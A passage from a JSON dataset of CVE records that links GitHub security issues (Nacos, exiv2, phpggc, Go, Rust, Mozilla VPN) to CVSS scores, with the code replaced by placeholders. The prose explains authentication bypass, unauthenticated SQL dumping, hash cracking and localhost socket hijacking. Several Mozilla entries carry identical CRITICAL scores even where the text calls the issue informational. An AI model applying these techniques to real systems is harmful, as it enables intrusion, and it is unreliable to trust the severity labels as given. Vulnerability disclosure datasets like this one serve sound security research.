\u53ef\u4ee5\u770b\u5230\uff0c\u4e0a\u9762\u4e09\u4e2aif else\u5206\u652f\uff1a \u7b2c\u4e00\u4e2a\u662f APITAG APITAG Agent\u662f\u5426\u5339\u914d APITAG \uff0c\u82e5\u5339\u914d\uff0c\u5219\u8df3\u8fc7\u540e\u7eed\u6240\u6709\u903b\u8f91\uff0c\u6267\u884c APITAG \u7b2c\u4e8c\u4e2a\u662f APITAG \uff0c\u4e5f\u5c31\u662fnacos NUMBERTAG APITAG \u5b89\u5168\u95ee\u9898\u7684\u7b80\u5355\u4fee\u590d APITAG APITAG APITAG \uff0c\u5f00\u542f\u8be5key value\u7b80\u5355\u9274\u6743\u673a\u5236\u540e\uff0c\u4f1a\u6839\u636e\u5f00\u53d1\u8005\u914d\u7f6e\u7684 APITAG \u53bbhttp header\u4e2d\u83b7\u53d6\u4e00\u4e2avalue\uff0c\u53bb\u8ddf\u5f00\u53d1\u8005\u914d\u7f6e\u7684 APITAG \u8fdb\u884c\u5339\u914d\uff0c\u82e5\u4e0d\u5339\u914d\uff0c\u5219\u4e0d\u8fdb\u5165\u5206\u652f\u6267\u884c\uff1a APITAG APITAG \u518d\u5f80\u4e0b\u770b\uff0c\u4ee3\u7801\u6765\u5230\uff1a CODETAG \u53ef\u4ee5\u770b\u5230\uff0c\u8fd9\u91cc\u6709\u4e00\u4e2a\u5224\u65ad APITAG \uff0c\u53ea\u8981\u6ee1\u8db3\u8fd9\u4e2a\u6761\u4ef6\uff0c\u5c31\u4e0d\u4f1a\u8d70\u5230\u540e\u7eed\u7684\u9274\u6743\u4ee3\u7801\u3002 \u901a\u8fc7\u67e5\u770b APITAG APITAG APITAG APITAG ERRORTAG ERRORTAG APITAG CODETAG APITAG APITAG APITAG \u4e00\u4e2a\u6b63\u5e38\u7684\u8bbf\u95ee\uff0c\u6bd4\u5982 APITAG \uff0c\u5f97\u5230\u7684path\u5c06\u4f1a\u662f APITAG \uff0c\u800c\u901a\u8fc7\u7279\u6b8a\u6784\u9020\u7684url\uff0c\u6bd4\u5982 APITAG \uff0c\u5f97\u5230\u7684path\u5c06\u4f1a\u662f APITAG PATHTAG APITAG NUMBERTAG APITAG \u53ef\u4ee5\u770b\u5230\uff0c\u7ed5\u8fc7\u4e86\u9274\u6743\uff0c\u8fd4\u56de\u4e86\u7528\u6237\u5217\u8868\u6570\u636e CODETAG NUMBERTAG APITAG \u53ef\u4ee5\u770b\u5230\uff0c\u7ed5\u8fc7\u4e86\u9274\u6743\uff0c\u6dfb\u52a0\u4e86\u65b0\u7528\u6237 APITAG NUMBERTAG APITAG APITAG CODETAG NUMBERTAG APITAG \uff0c\u767b\u5f55\u65b0\u8d26\u53f7\uff0c\u53ef\u4ee5\u505a\u4efb\u4f55\u4e8b\u60c5 regards, threedr3am",
  65295. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65296. "severity": "CRITICAL",
  65297. "baseScore": 9.8,
  65298. "impactScore": 5.9,
  65299. "exploitabilityScore": 3.9
  65300. },
  65301. {
  65302. "CVE_ID": "CVE-2021-29442",
  65303. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/4463",
  65304. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/4463",
  65305. "Repo_new": "alibaba/nacos",
  65306. "Issue_Created_At": "2020-12-12T06:55:26Z",
  65307. "description": "Report a security vulnerability in nacos to execute arbitrary SQL without authentication. \uff08english\uff09 Hello, I am threedr3am. I found a nacos interface. When nacos is deployed in the default configuration, it can be accessed without authentication and execute arbitrary SQL queries, which leads to the disclosure of sensitive information NUMBERTAG ulnerability details Source address: URLTAG The audit code can find that there is an interface in the config server, and the SQL statement can be executed without any authentication, and all data can be leaked The vulnerability lies in the module: APITAG in nacos config ERRORTAG As you can see, the code only limits the need to include select, so any select query statement can be executed Through the test, you can use the following statement to query all database information CODETAG The most important thing is that the interface does not require any authentication and can be accessed directly After reading the account number and the password after the hash, we can analyze it through the open source program source code because of the salt generation algorithm used when nacos creates the account. Look at the source code APITAG ERRORTAG As you can see, they are all default and users cannot modify them Therefore, refer to the tool class APITAG In this way, the password represented by the hash value can be quickly blasted locally CODETAG NUMBERTAG the loopholes reproduce Deployment process NUMBERTAG Go to github to download the latest release: URLTAG NUMBERTAG Execute PATHTAG m standalone to run locally poc\uff1a APITAG NUMBERTAG Scope of influence All versions \uff08\u4e2d\u6587\uff09 APITAG \u4e00\u3001\u6f0f\u6d1e\u8be6\u60c5 \u6e90\u7801\u5730\u5740\uff1a URLTAG \u5ba1\u8ba1\u4ee3\u7801\u53ef\u4ee5\u53d1\u73b0\uff0cconfig APITAG \u6f0f\u6d1e\u70b9\u5728\u4e8emodule\uff1anacos APITAG ERRORTAG APITAG \u901a\u8fc7\u6d4b\u8bd5\uff0c\u53ef\u4ee5\u7528\u4ee5\u4e0b\u7684\u8bed\u53e5\u67e5\u8be2\u5230\u6240\u6709\u6570\u636e\u5e93\u4fe1\u606f CODETAG \u6700\u91cd\u8981\u7684\u662f\uff0c\u8be5\u63a5\u53e3\u4e0d\u9700\u8981\u4efb\u4f55\u8ba4\u8bc1\uff0c\u76f4\u63a5\u5c31\u53ef\u4ee5\u8bbf\u95ee APITAG APITAG ERRORTAG \u53ef\u4ee5\u770b\u5230\uff0c\u90fd\u662f\u9ed8\u8ba4\u7684\uff0c\u4f7f\u7528\u8005\u6ca1\u6cd5\u505a\u4fee\u6539 APITAG \u901a\u8fc7\u8fd9\u6837\u7684\u65b9\u5f0f\uff0c\u53ef\u4ee5\u5728\u672c\u5730\u5feb\u901f\u7684\u7206\u7834\u51fahash\u503c\u8868\u793a\u7684\u5bc6\u7801 CODETAG NUMBERTAG github\u4e0b\u8f7d\u6700\u65b0\u7248release\uff1a URLTAG NUMBERTAG PATHTAG m standalone\u672c\u5730\u8fd0\u884c poc\uff1a APITAG \u4e09\u3001\u5f71\u54cd\u8303\u56f4 \u6240\u6709\u7248\u672c",
  65308. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  65309. "severity": "HIGH",
  65310. "baseScore": 7.5,
  65311. "impactScore": 3.6,
  65312. "exploitabilityScore": 3.9
  65313. },
  65314. {
  65315. "CVE_ID": "CVE-2021-29457",
  65316. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1529",
  65317. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1529",
  65318. "Repo_new": "exiv2/exiv2",
  65319. "Issue_Created_At": "2021-04-08T03:01:08Z",
  65320. "description": "heap buffer overflow write in APITAG VERSION exi NUMBERTAG URLTAG REPRODUCE Compile exi NUMBERTAG with asan: CODETAG Dowload testcases: URLTAG FILETAG exi NUMBERTAG in APITAG ERRORTAG Credit: Zhen Zhou of NSFOCUS Security Team",
  65321. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65322. "severity": "HIGH",
  65323. "baseScore": 7.8,
  65324. "impactScore": 5.9,
  65325. "exploitabilityScore": 1.8
  65326. },
  65327. {
  65328. "CVE_ID": "CVE-2021-29458",
  65329. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1530",
  65330. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1530",
  65331. "Repo_new": "exiv2/exiv2",
  65332. "Issue_Created_At": "2021-04-08T07:27:55Z",
  65333. "description": "heap buffer overflow Read in APITAG VERSION exi NUMBERTAG URLTAG REPRODUCE Compile exi NUMBERTAG with asan: CODETAG Dowload testcases: URLTAG FILETAG Run command: APITAG ERRORTAG Credit: Zhen Zhou of NSFOCUS Security Team",
  65334. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65335. "severity": "MEDIUM",
  65336. "baseScore": 5.5,
  65337. "impactScore": 3.6,
  65338. "exploitabilityScore": 1.8
  65339. },
  65340. {
  65341. "CVE_ID": "CVE-2021-29476",
  65342. "Issue_Url_old": "https://github.com/ambionics/phpggc/issues/52",
  65343. "Issue_Url_new": "https://github.com/ambionics/phpggc/issues/52",
  65344. "Repo_new": "ambionics/phpggc",
  65345. "Issue_Created_At": "2019-04-29T20:14:43Z",
  65346. "description": "Wrapper to bypass checks. There is a trick which can be used to bypass some attempts to validate the serialised data given: Put a APITAG before all integer values of Object and/or Classes (there might be also possible for integer and string, haven't checked). For instance: APITAG would become APITAG So far I am using a wrapper as this is a very specific situation to bypass the check in place: ERRORTAG However, it might be interesting to add it as an enhancement",
  65347. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65348. "severity": "CRITICAL",
  65349. "baseScore": 9.8,
  65350. "impactScore": 5.9,
  65351. "exploitabilityScore": 3.9
  65352. },
  65353. {
  65354. "CVE_ID": "CVE-2021-29482",
  65355. "Issue_Url_old": "https://github.com/ulikunitz/xz/issues/35",
  65356. "Issue_Url_new": "https://github.com/ulikunitz/xz/issues/35",
  65357. "Repo_new": "ulikunitz/xz",
  65358. "Issue_Created_At": "2020-08-18T20:54:07Z",
  65359. "description": "[SECURITY] Implementation of APITAG vulnerable to CVETAG . Implementation of APITAG at URLTAG is very similar to the vulnerable code in the Golang APITAG library and seems to suffer from the same vulnerability described in URLTAG See the fix at FILETAG Note: I couldn't find any information on how to disclose this issue to the maintainers. I would also suggest setting up a Security Policy for the project within APITAG",
  65360. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65361. "severity": "HIGH",
  65362. "baseScore": 7.5,
  65363. "impactScore": 3.6,
  65364. "exploitabilityScore": 3.9
  65365. },
  65366. {
  65367. "CVE_ID": "CVE-2021-29486",
  65368. "Issue_Url_old": "https://github.com/DrPaulBrewer/cumulative-distribution-function/issues/7",
  65369. "Issue_Url_new": "https://github.com/drpaulbrewer/cumulative-distribution-function/issues/7",
  65370. "Repo_new": "drpaulbrewer/cumulative-distribution-function",
  65371. "Issue_Created_At": "2021-04-09T13:36:47Z",
  65372. "description": "cdf never yields result for certain inpu. Hi, thanks you for providing this package. Given a specific data set we found that the function is stuck in a while loop. This can be reproduced reliably through the following example: ERRORTAG I hope you find this useful.",
  65373. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65374. "severity": "HIGH",
  65375. "baseScore": 7.5,
  65376. "impactScore": 3.6,
  65377. "exploitabilityScore": 3.9
  65378. },
  65379. {
  65380. "CVE_ID": "CVE-2021-29499",
  65381. "Issue_Url_old": "https://github.com/satori/go.uuid/issues/73",
  65382. "Issue_Url_new": "https://github.com/satori/go.uuid/issues/73",
  65383. "Repo_new": "satori/go.uuid",
  65384. "Issue_Created_At": "2018-03-23T20:58:32Z",
  65385. "description": "APITAG non random uuid. I'm running this on my macbook pro. I'm using APITAG to generate random identifiers. I'm generating theses identifiers at a _very_ low rate of a few dozen per days Here are some non random UUID that I got in the last weeks: CODETAG",
  65386. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  65387. "severity": "HIGH",
  65388. "baseScore": 7.5,
  65389. "impactScore": 3.6,
  65390. "exploitabilityScore": 3.9
  65391. },
  65392. {
  65393. "CVE_ID": "CVE-2021-29922",
  65394. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/83648",
  65395. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/83648",
  65396. "Repo_new": "rust-lang/rust",
  65397. "Issue_Created_At": "2021-03-29T16:13:38Z",
  65398. "description": "APITAG Incorrect Parsing for Octal format IP string . This issue is inspired by this blog URLTAG . Due to the specification, leading zero in IP string is interpreted as octal literals. So a IP address APITAG actually means APITAG . As shown in the following example: APITAG However, the APITAG from the std library will recognize it as APITAG instead. A simple code to demo the situation ( playground link URLTAG : CODETAG I expected to see this happen: APITAG Instead, this happened: APITAG Noted this bug may cause security vulnerability in certain case. For example, a Rust program uses APITAG doing some sanity check then passing the user string to other library or program. Furthermore, the specification actually also allows hex format in IP string. Meta APITAG : APITAG",
  65399. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  65400. "severity": "CRITICAL",
  65401. "baseScore": 9.1,
  65402. "impactScore": 5.2,
  65403. "exploitabilityScore": 3.9
  65404. },
  65405. {
  65406. "CVE_ID": "CVE-2021-29923",
  65407. "Issue_Url_old": "https://github.com/golang/go/issues/43389",
  65408. "Issue_Url_new": "https://github.com/golang/go/issues/43389",
  65409. "Repo_new": "golang/go",
  65410. "Issue_Created_At": "2020-12-26T16:59:03Z",
  65411. "description": "net: limit the size of APITAG input?. Maybe APITAG shouldn't successfully parse IP addresses out of unbounded inputs? e.g. APITAG passes, as does APITAG ( URLTAG Of course, in both those cases the data is already fully in memory, so most the harm has been done if this is attacker controlled. Still, a bit surprising. Intentional? Some parsers reject past NUMBERTAG digits, so APITAG is valid, but not more than NUMBERTAG bytes for an IP NUMBERTAG adddress.",
  65412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  65413. "severity": "HIGH",
  65414. "baseScore": 7.5,
  65415. "impactScore": 3.6,
  65416. "exploitabilityScore": 3.9
  65417. },
  65418. {
  65419. "CVE_ID": "CVE-2021-29923",
  65420. "Issue_Url_old": "https://github.com/golang/go/issues/30999",
  65421. "Issue_Url_new": "https://github.com/golang/go/issues/30999",
  65422. "Repo_new": "golang/go",
  65423. "Issue_Created_At": "2019-03-22T06:48:19Z",
  65424. "description": "net/http: octal literals in IP addresses are interpreted as decimal ones. What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? Yes. What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOOS=\"linux\" PATHTAG GOPROXY=\"\" GORACE=\"\" PATHTAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" APITAG APITAG What did you do? APITAG What did you expect to see? APITAG is interpreted as APITAG . APITAG What did you see instead? The program tries to connect to APITAG .",
  65425. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  65426. "severity": "HIGH",
  65427. "baseScore": 7.5,
  65428. "impactScore": 3.6,
  65429. "exploitabilityScore": 3.9
  65430. },
  65431. {
  65432. "CVE_ID": "CVE-2021-29978",
  65433. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/803",
  65434. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/803",
  65435. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65436. "Issue_Created_At": "2021-04-07T15:53:29Z",
  65437. "description": "FVP NUMBERTAG WP5: Android app allows backups of application data. The APITAG property in the FILETAG file specifies if the data pertinent to the apps can be backed up NUMBERTAG Without setting the APITAG flag to false, the backup feature is enabled by default. In case an attacker is able to send adb commands to user phones, they could get access to all of the stored data from the protected data folders, inclusive of the VPN configuration data. Affected File: APITAG As this feature does not require a rooted phone, disallowing backups completely should be considered. Due to the fact that an absence of the flag will set it to true by default, it is recommended to explicitly set the APITAG flag to false within the application tag.",
  65438. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65439. "severity": "CRITICAL",
  65440. "baseScore": 9.8,
  65441. "impactScore": 5.9,
  65442. "exploitabilityScore": 3.9
  65443. },
  65444. {
  65445. "CVE_ID": "CVE-2021-29978",
  65446. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/805",
  65447. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/805",
  65448. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65449. "Issue_Created_At": "2021-04-07T15:55:02Z",
  65450. "description": "FVP NUMBERTAG WP5: Android app supports insecure NUMBERTAG signature. The discovery was made that the provided Android staging and production builds are signed with an insecure NUMBERTAG APK signature. Using the insecure NUMBERTAG signature makes the app prone to the known Janus4 vulnerability on devices running Android NUMBERTAG The problem lets attackers smuggle malicious code into the APK without breaking the signature. At the time of writing, the app supports a minimum SDK of NUMBERTAG APITAG NUMBERTAG which only uses the NUMBERTAG signature and is, hence, vulnerable to this attack. The existence of this flaw means that attackers could trick users into installing a malicious attacker controlled APK which matches the NUMBERTAG APK signature of the Mozilla VPN Android application. As a result, a transparent update would be possible without warnings appearing in Android, effectively taking over the existing application and all of its data. It is recommended to increase the minimum supported SDK level to at least NUMBERTAG APITAG NUMBERTAG to ensure that this known vulnerability cannot be exploited on devices running older Android versions. In addition, the production builds should only be shipped with NUMBERTAG and NUMBERTAG APK signatures.",
  65451. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65452. "severity": "CRITICAL",
  65453. "baseScore": 9.8,
  65454. "impactScore": 5.9,
  65455. "exploitabilityScore": 3.9
  65456. },
  65457. {
  65458. "CVE_ID": "CVE-2021-29978",
  65459. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/804",
  65460. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/804",
  65461. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65462. "Issue_Created_At": "2021-04-07T15:54:19Z",
  65463. "description": "FVP NUMBERTAG WP5: Secure flag missing on views for Android app. During the assessment of the Android app, the discovery was made that the FLAG_SECURE security flag is not deployed to protect views that display sensitive content. By applying the flag for Android views, the app\u2019s windows can no longer be manually \u201cscreenshotted\u201d. Additionally, the items would be excluded from automatic screenshots or screen recordings, which ultimately prevents screen data from leakage to alternative apps. Particularly for the implemented views displaying sensitive data, e.g. during the login process, adding this flag is important. An attacker would otherwise be able to steal sensitive data, such as login credentials or personal information, doing it after it has been displayed. Hence, this information could be stolen from the services via a malicious app.",
  65464. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65465. "severity": "CRITICAL",
  65466. "baseScore": 9.8,
  65467. "impactScore": 5.9,
  65468. "exploitabilityScore": 3.9
  65469. },
  65470. {
  65471. "CVE_ID": "CVE-2021-29978",
  65472. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/806",
  65473. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/806",
  65474. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65475. "Issue_Created_At": "2021-04-07T15:56:28Z",
  65476. "description": "FVP NUMBERTAG API: Information disclosure via device endpoint. It was found that the corresponding API used by the Mozilla VPN applications includes sensitive information into response messages in case an error is triggered. The backend speaks to the Mullvad partner API which handles account related data for each Mozilla VPN user. However, if the Mullvad API throws an error, the backend includes this message in the response and returns it to the client. This might lead to an exposure of sensitive data, such as the corresponding Mullvad account ID, as shown below. Adversaries would be able to leverage this sort of information to perform further attacks against the connected APIs. ERRORTAG It is recommended not to route error messages received from the Mullvad partner API back to the client. Instead, a static error message or an error identifier should be employed to be able to monitor the application.",
  65477. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65478. "severity": "CRITICAL",
  65479. "baseScore": 9.8,
  65480. "impactScore": 5.9,
  65481. "exploitabilityScore": 3.9
  65482. },
  65483. {
  65484. "CVE_ID": "CVE-2021-29978",
  65485. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/809",
  65486. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/809",
  65487. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65488. "Issue_Created_At": "2021-04-07T15:58:23Z",
  65489. "description": "FVP NUMBERTAG WP5: Android app exposes sensitive data to system logs. It was found that the Android app makes frequent use of logging features to be able to monitor events. However, this can be considered a bad practice, especially in production environments where tokens and codes of Mozilla VPN users might be accessible by third parties. In case the device is connected to the computer with debugging enabled via USB, an attacker may be able to get access to the logs via adb logcat. From there, extraction of user tokens may be achievable. Note that apps with system privileges are able to access logs directly on rooted devices.",
  65490. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65491. "severity": "CRITICAL",
  65492. "baseScore": 9.8,
  65493. "impactScore": 5.9,
  65494. "exploitabilityScore": 3.9
  65495. },
  65496. {
  65497. "CVE_ID": "CVE-2021-29978",
  65498. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/808",
  65499. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/808",
  65500. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65501. "Issue_Created_At": "2021-04-07T15:57:56Z",
  65502. "description": "FVP NUMBERTAG WP5: Unencrypted shared preferences. During the assessment of the Android app, the discovery was made that the application does not always consistently use the encrypted shared preference feature provided by the Android SDK. This may lead to an information disclosure in case a local attacker is able to get root access to the phone or the data is obtainable via backups (see FVP NUMBERTAG Sensitive information stored within the shared_prefs data folder in plain text, such as user VPN IPs and private keys, could be revealed. It is advised to use the provided wrapper class called APITAG to encrypt sensitive data stored within the shared_prefs folder, so as to make the application more robust against the illustrated attacks. The wrapper class uses the Android Keystore for handling the master key and is used to encrypt/decrypt all other keysets. For more information, please refer to the official Android guide on storing data more securely. Additionally, it is also advised to store VPN configuration data via encrypted shared preferences, which is actually also written to the vpn.moz file in plain text.",
  65503. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65504. "severity": "CRITICAL",
  65505. "baseScore": 9.8,
  65506. "impactScore": 5.9,
  65507. "exploitabilityScore": 3.9
  65508. },
  65509. {
  65510. "CVE_ID": "CVE-2021-29978",
  65511. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/797",
  65512. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/797",
  65513. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65514. "Issue_Created_At": "2021-04-07T15:48:16Z",
  65515. "description": "FVP NUMBERTAG WP1: Balrog does not verify certificate chain on APITAG It was found that Balrog does not verify the whole certificate chain on APITAG This allows attackers to supply a self signed leaf certificate, effectively indicating a bypass of Balrog. This could be abused by state funded attackers who are in charge of a trusted valid certificate authority. They could perform a Man in the Middle attack and replace the binary code provided by the Mozilla VPN update with malicious malware.",
  65516. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65517. "severity": "CRITICAL",
  65518. "baseScore": 9.8,
  65519. "impactScore": 5.9,
  65520. "exploitabilityScore": 3.9
  65521. },
  65522. {
  65523. "CVE_ID": "CVE-2021-29978",
  65524. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/799",
  65525. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/799",
  65526. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65527. "Issue_Created_At": "2021-04-07T15:49:46Z",
  65528. "description": "FVP NUMBERTAG WP4: ATS policy unnecessarily weakened. The iOS Mozilla VPN app was checked for property settings which weaken the security of the application. It was discovered that APITAG is set. This means it disables the default App Transport Security restrictions and permits the app to utilize plain text HTTP requests. Affected File: APITAG Affected Code: APITAG As neither the source code nor the runtime assessment indicated that the iOS app actually requires plain text HTTP, it should be taken into consideration to remove this property. This would ensure that the default ATS restrictions are enforced.",
  65529. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65530. "severity": "CRITICAL",
  65531. "baseScore": 9.8,
  65532. "impactScore": 5.9,
  65533. "exploitabilityScore": 3.9
  65534. },
  65535. {
  65536. "CVE_ID": "CVE-2021-29978",
  65537. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/810",
  65538. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/810",
  65539. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65540. "Issue_Created_At": "2021-04-07T15:58:54Z",
  65541. "description": "FVP NUMBERTAG General: Cross site APITAG hijacking. The provided staging build contains the Mozilla VPN APITAG Controller, which exposes a APITAG endpoint on localhost. No additional authentication is required to interact with this port, thus allowing any website to connect and interact with the VPN client. At the beginning of the audit, Mozilla assured that this APITAG server is only part of the staging build. However, later it was revealed that Mozilla would like to reuse this connection for communication with a browser extension in the future. Thus, Cure NUMBERTAG decided to report this issue. The following code can be hosted on an arbitrary website. When Mozilla VPN is running, the website will connect to the APITAG port and request a screenshot. This screenshot can then be leaked to the attacker.",
  65542. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65543. "severity": "CRITICAL",
  65544. "baseScore": 9.8,
  65545. "impactScore": 5.9,
  65546. "exploitabilityScore": 3.9
  65547. },
  65548. {
  65549. "CVE_ID": "CVE-2021-29978",
  65550. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/798",
  65551. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/798",
  65552. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65553. "Issue_Created_At": "2021-04-07T15:48:56Z",
  65554. "description": "FVP NUMBERTAG General: Balrog incorrectly verifies certificate chain. It was found that Balrog does not properly verify the certificate chain, permitting rogue root certificates and their fellowship to pass. The attacker controlled leaf certificate holds a public key that will be used to verify the update used in Windows and APITAG This signifies the risk of state funded attackers who are in charge of a trusted certificate authority being able to perform Man in the Middle attacks on the TLS connection initiated by Mozilla VPN to receive updates. Attackers can now replace the binary code of the update with malicious malware bypassing the Balrog mechanism that intends to detect those attacks.",
  65555. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65556. "severity": "CRITICAL",
  65557. "baseScore": 9.8,
  65558. "impactScore": 5.9,
  65559. "exploitabilityScore": 3.9
  65560. },
  65561. {
  65562. "CVE_ID": "CVE-2021-29978",
  65563. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/801",
  65564. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/801",
  65565. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65566. "Issue_Created_At": "2021-04-07T15:52:13Z",
  65567. "description": "FVP NUMBERTAG WP3: Race condition in Ping Sender could expose gateway IP. It was found that Mozilla VPN was prone to a race condition vulnerability in the Ping Sender that frequently delivers ICMP packets to the internal IP address of the APITAG gateway. Shortly after turning the VPN off, those ICMP packets are at risk of being sent outside of the APITAG tunnel and might reveal which gateway IP was used. Since this event is very rare and unreliable, whilst information leakage is additionally scarce, this issue is of purely informational nature.",
  65568. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65569. "severity": "CRITICAL",
  65570. "baseScore": 9.8,
  65571. "impactScore": 5.9,
  65572. "exploitabilityScore": 3.9
  65573. },
  65574. {
  65575. "CVE_ID": "CVE-2021-29978",
  65576. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/812",
  65577. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/812",
  65578. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65579. "Issue_Created_At": "2021-04-07T16:02:36Z",
  65580. "description": "FVP NUMBERTAG APITAG Auth code could be leaked by injecting port. When a user wants to log into Mozilla VPN, the VPN client will make a request to https:// PATHTAG to obtain an authorization URL. The endpoint takes a port parameter that will be reflected in a APITAG element after the user signs into the web page. It was found that the port parameter can be of arbitrary value. Further, it is possible to inject the @ sign, so that the request will go to an arbitrary host instead of localhost. Theoretically, an attacker can give a crafted URL to a victim and once the victim uses it to log in, their authorization code will be leaked to the attacker\u2019s website. However, the CSP in place contains a strict img src directive which prevents exploitation.",
  65581. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65582. "severity": "CRITICAL",
  65583. "baseScore": 9.8,
  65584. "impactScore": 5.9,
  65585. "exploitabilityScore": 3.9
  65586. },
  65587. {
  65588. "CVE_ID": "CVE-2021-29978",
  65589. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/800",
  65590. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/800",
  65591. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65592. "Issue_Created_At": "2021-04-07T15:50:57Z",
  65593. "description": "FVP NUMBERTAG WP NUMBERTAG Authenticationlistener allows disturbance of login. It was found that Mozilla VPN in desktop environments sets up an HTTP server listening on a port acting as the APITAG callback expecting an Authorization Code to complete the Authentication of Mozilla VPN. This means there is a risk of attackers spamming requests to the local server via APITAG potentially disturbing the login process of the apps. This is possible as the local HTTP server is not protected by an additional secret and cannot distinguish between legitimate requests from malicious ones.",
  65594. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
